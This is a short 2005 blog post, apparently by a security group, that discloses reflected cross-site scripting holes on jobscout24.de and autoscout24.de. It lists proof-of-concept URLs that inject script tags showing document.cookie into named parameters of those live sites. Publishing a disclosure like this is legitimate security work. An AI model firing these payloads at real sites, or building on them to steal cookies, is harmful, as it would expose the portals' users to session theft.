by r0t,der4444,cembo,VietMafia

Saturday, December 17, 2005

scout24 vuln.

jobscout24.de

http://jobscout24.de/stellenangebote/
JSStsuch.asp?PN=2&PS=10&IDSTBF=-54&T
BID=%22%3E%3Cscript%3Ealert('docume
nt.cookie')%3C/script%3E

http://jobscout24.de/stellenangebote
/JSStsuch.asp?PN=2&PS=10&IDSTBF=%22%3
E%3Cscript%3Ealert(document.cookie)%3C/
script%3E


www.autoscout24.de

http://www.autoscout24.de/home/index/
detail.asp?ts=383334.4&id=fgucmbzdefa
&source=%22%3E%3Cscript%3Ealert(docum
ent.cookie)%3C/script%3E

http://www.autoscout24.de/home/index
/search.asp?make=r0t:)

other scout´s have same type vuln.
Maybe in small aplications XSS attacks are nothing, but in big portals like this one is very dangerous.

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew